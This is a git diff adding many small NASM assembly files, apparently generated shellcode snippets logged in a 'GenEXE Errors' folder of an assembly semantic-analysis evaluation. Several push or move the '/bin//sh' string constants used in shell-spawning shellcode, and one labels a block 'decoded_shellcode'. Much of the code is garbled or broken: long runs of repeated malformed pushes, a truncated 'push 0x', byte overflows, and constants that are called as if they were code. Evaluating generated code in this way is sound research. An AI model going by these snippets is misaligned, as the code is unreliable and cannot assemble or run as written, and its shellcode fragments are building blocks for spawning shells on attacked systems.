b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_375.asm new file mode 100644 index 0000000000000000000000000000000000000000..0718f69dff06adcc009dc9851b1a4a8a9777ceef --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_375.asm @@ -0,0 +1,14 @@ +section .data + +stack equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + decoded_shellcode: + call stack + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_375.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_375.obj new file mode 100644 index 0000000000000000000000000000000000000000..d6d4e21e4119bbecbcac88137e8952bd6eb0d2cd Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_375.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_376.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_376.asm new file mode 100644 index 0000000000000000000000000000000000000000..d777ffc52fbbb558442f1129d9cbd896779276e0 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_376.asm @@ -0,0 +1,21 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov eax, 0x68732f2f + mov eax, 0x68732f + mov eax, 0x6e69622f + mov eax, 0x69622f + mov eax, 0x69622f + mov eax, 0x69622f + mov eax, 0x6e69622f + mov eax, 0x69622f + mov eax, 0x69622f2f + mov eax, 0x69622f + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_376.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_376.obj new file mode 100644 index 0000000000000000000000000000000000000000..b1af2c888204fb01df64051564438caf5d4e8f57 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_376.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_377.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_377.asm new file mode 100644 index 0000000000000000000000000000000000000000..431b055b5efdaf50459a7865c83e943b1a297373 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_377.asm @@ -0,0 +1,14 @@ +section .data + +while equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + cmp ax, bx + jne while + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_377.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_377.obj new file mode 100644 index 0000000000000000000000000000000000000000..a9ba16cad92100ebcf14eba9e4bbf988c8a3facd Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_377.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_380.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_380.asm new file mode 100644 index 0000000000000000000000000000000000000000..fb3096cab0b467430ee300da3028a8fffff4dae3 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_380.asm @@ -0,0 +1,18 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push 0x68732f2f + push 0x6e69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + mov edi, esp + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_380.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_380.obj new file mode 100644 index 0000000000000000000000000000000000000000..5f8844aa27ce628b59b5715d76864e63bca40521 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_380.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_382.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_382.asm new file mode 100644 index 0000000000000000000000000000000000000000..0de0e38a6d2ddb35a6af971fecdb0ddfcfb039ff --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_382.asm @@ -0,0 +1,14 @@ +section .data + +stack equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + L4: + jmp short stack + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_382.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_382.obj new file mode 100644 index 0000000000000000000000000000000000000000..413091ac385bc0973914613d478e4ab032687985 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_382.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_385.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_385.asm new file mode 100644 index 0000000000000000000000000000000000000000..39e9ff05adc87049878f92ed3be67487f20cab7a --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_385.asm @@ -0,0 +1,13 @@ +section .data + +_setup equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + jmp short _setup + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_385.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_385.obj new file mode 100644 index 0000000000000000000000000000000000000000..f8b4738d239573dfa298b77db06b0779b3aae4b7 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_385.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_394.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_394.asm new file mode 100644 index 0000000000000000000000000000000000000000..0e9641eb685b61aac9697955bbf2d26b8dff8bb1 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_394.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + _zero1e: + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_394.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_394.obj new file mode 100644 index 0000000000000000000000000000000000000000..8cf92265a1b65414670608b1162eb1c5bff269d2 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_394.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_395.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_395.asm new file mode 100644 index 0000000000000000000000000000000000000000..ea25f5e4dec92c3a5f25eeffd9273dbcfcd0645c --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_395.asm @@ -0,0 +1,13 @@ +section .data + +sys_read equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + call sys_read + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_395.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_395.obj new file mode 100644 index 0000000000000000000000000000000000000000..073d9ba856ffbaefc876c2d6c7fa9397d316a59b Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_395.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_398.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_398.asm new file mode 100644 index 0000000000000000000000000000000000000000..107110c5c51e90ecefa38f028c5640eda631feb7 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_398.asm @@ -0,0 +1,13 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + xor eax, eax + xor edx, edx + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_398.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_398.obj new file mode 100644 index 0000000000000000000000000000000000000000..10c0fbf4fc0a3873cae55840b3b9aa2f9df1b05e Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_398.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_40.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_40.asm new file mode 100644 index 0000000000000000000000000000000000000000..dc01f6d3617f3a7f8f86df55dd95e2237f306a71 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_40.asm @@ -0,0 +1,11 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_40.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_40.obj new file mode 100644 index 0000000000000000000000000000000000000000..6df89eda81e4a0014c2d22d8babc246d8e32196c Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_40.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_400.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_400.asm new file mode 100644 index 0000000000000000000000000000000000000000..d3ade439993098e155d4b216fb20f148faad1759 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_400.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + xor eax, eax + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_400.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_400.obj new file mode 100644 index 0000000000000000000000000000000000000000..82553261a6eaf64c1c0f43c2428c7ff8759f631c Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_400.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_402.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_402.asm new file mode 100644 index 0000000000000000000000000000000000000000..a226034864e13b86aad4a79cec3c361beed1a3a0 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_402.asm @@ -0,0 +1,13 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + inc cl + inc cl + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_402.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_402.obj new file mode 100644 index 0000000000000000000000000000000000000000..2738fe7b9d8c6c926d6953cb29be863080cd7aa1 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_402.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_410.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_410.asm new file mode 100644 index 0000000000000000000000000000000000000000..c83a19b1722ce4e748a8bda34d2fc9c89c9903ef --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_410.asm @@ -0,0 +1,13 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push ebx + push esi + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_410.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_410.obj new file mode 100644 index 0000000000000000000000000000000000000000..2b815aa0f06ee427ec546207e4fce641322d639f Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_410.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_411.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_411.asm new file mode 100644 index 0000000000000000000000000000000000000000..78a2f0692b368c3cce6facd71e97810ff2828e7e --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_411.asm @@ -0,0 +1,14 @@ +section .data + +checkforfile equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + test eax, eax + jz checkforfile + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_411.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_411.obj new file mode 100644 index 0000000000000000000000000000000000000000..71321d8f4ca4586d86340b940c238193129ab62f Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_411.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_413.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_413.asm new file mode 100644 index 0000000000000000000000000000000000000000..e6f86fa721c77ba352d1e894040c351e51ae8e0a --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_413.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov cl, 2 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_413.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_413.obj new file mode 100644 index 0000000000000000000000000000000000000000..8cb33364b86b5b39cb8ca8af46e3d7f1aee0b747 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_413.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_414.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_414.asm new file mode 100644 index 0000000000000000000000000000000000000000..f12abd7dabdf6ab5f09fda1ee30002021e842616 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_414.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + rol edx, 4 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_414.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_414.obj new file mode 100644 index 0000000000000000000000000000000000000000..d87a61148ce12a7ae4a3834429fec9497b71874c Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_414.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_416.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_416.asm new file mode 100644 index 0000000000000000000000000000000000000000..c7d3d7744b01b723a45c78acc7a7435b28056556 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_416.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov edi, edi + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_416.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_416.obj new file mode 100644 index 0000000000000000000000000000000000000000..73506e1375a342ddd14745a4175a5bae4a1b926d Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_416.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_417.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_417.asm new file mode 100644 index 0000000000000000000000000000000000000000..7fcd8a57259dd71778a3fb69975126f0ebfa190d --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_417.asm @@ -0,0 +1,13 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + xor ebx, ebx + xor eax, eax + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_417.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_417.obj new file mode 100644 index 0000000000000000000000000000000000000000..f2bfca9e346e67e5b7abc1939d560eedacb0612c Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_417.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_422.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_422.asm new file mode 100644 index 0000000000000000000000000000000000000000..f8cb5eed8074a91c8de2d0915945a0317df082a7 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_422.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov edi, [esi] + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_422.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_422.obj new file mode 100644 index 0000000000000000000000000000000000000000..90d07ca757e87fac97ced34299911ac5e1532373 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_422.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_425.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_425.asm new file mode 100644 index 0000000000000000000000000000000000000000..4284d775e56363f2a558dc64974f91d09d846550 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_425.asm @@ -0,0 +1,14 @@ +section .data + +function1 equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + F2: + call function1 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_425.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_425.obj new file mode 100644 index 0000000000000000000000000000000000000000..e84e76b5406d22ba19cbbc2719f1d5c1b9171d85 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_425.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_428.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_428.asm new file mode 100644 index 0000000000000000000000000000000000000000..68e27c51b01b3104b24338193a3c71f4ff9e116b --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_428.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + init: + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_428.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_428.obj new file mode 100644 index 0000000000000000000000000000000000000000..920f61ae0d9fb4777b8e842b42f778bb839263fc Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_428.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_431.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_431.asm new file mode 100644 index 0000000000000000000000000000000000000000..a454e3b5160b70e2e81ca73d03db7d1903005207 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_431.asm @@ -0,0 +1,14 @@ +section .data + +all equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + cmp eax, ebx + jne all + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_431.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_431.obj new file mode 100644 index 0000000000000000000000000000000000000000..30d2ba54eb93cd7cca9e2e694ca0f7e419f7abc8 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_431.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_436.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_436.asm new file mode 100644 index 0000000000000000000000000000000000000000..e7cc3ee9270df90c832c3d034699e1bf67712ff4 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_436.asm @@ -0,0 +1,13 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + cmp eax, dword [edi] + not dword [edi] + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_436.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_436.obj new file mode 100644 index 0000000000000000000000000000000000000000..602b50941fb1d1db8cb6f858ab71220ec87650f0 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_436.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_44.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_44.asm new file mode 100644 index 0000000000000000000000000000000000000000..e5b057297107185db6ebbdb2433737d95e6f52ee --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_44.asm @@ -0,0 +1,26 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push edx + push 0x68732f + push 0x68732f + push 0x6e69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_44.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_44.obj new file mode 100644 index 0000000000000000000000000000000000000000..9c4a8cc60396aa8fc4c4289c3c9037b7b5bf8bff Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_44.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_442.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_442.asm new file mode 100644 index 0000000000000000000000000000000000000000..4f8c38d3bbecdb648f169444e1753f3cf581eabf --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_442.asm @@ -0,0 +1,14 @@ +section .data + +write equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + test eax, eax + jz write + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_442.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_442.obj new file mode 100644 index 0000000000000000000000000000000000000000..856f70b7fb7a6c788328bd6844601c473d5f3d5d Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_442.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_445.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_445.asm new file mode 100644 index 0000000000000000000000000000000000000000..b283b5766c4347a8708d853922cae810c8e3c663 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_445.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push 1 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_445.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_445.obj new file mode 100644 index 0000000000000000000000000000000000000000..babf1246f4643d18e3fdd3246aa275eff0ea844e Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_445.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_446.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_446.asm new file mode 100644 index 0000000000000000000000000000000000000000..ab252afd9164b37ffc36880ed64676a285e4634b --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_446.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + word1: db 65535 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_446.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_446.obj new file mode 100644 index 0000000000000000000000000000000000000000..452cd596551b8a1a5a57e999e7d046f94e811cd9 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_446.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_448.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_448.asm new file mode 100644 index 0000000000000000000000000000000000000000..49b23eed4d7402e0f88c4db555f1098289eb224e --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_448.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov eax, 0x68732f2f + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_448.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_448.obj new file mode 100644 index 0000000000000000000000000000000000000000..6a32815e97e47557d4aac289fbbcd5fb96a7c04e Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_448.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_452.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_452.asm new file mode 100644 index 0000000000000000000000000000000000000000..c33d2a062574928ce40c8b2b0826b0473e71d792 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_452.asm @@ -0,0 +1,14 @@ +section .data + +_while_loop equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + 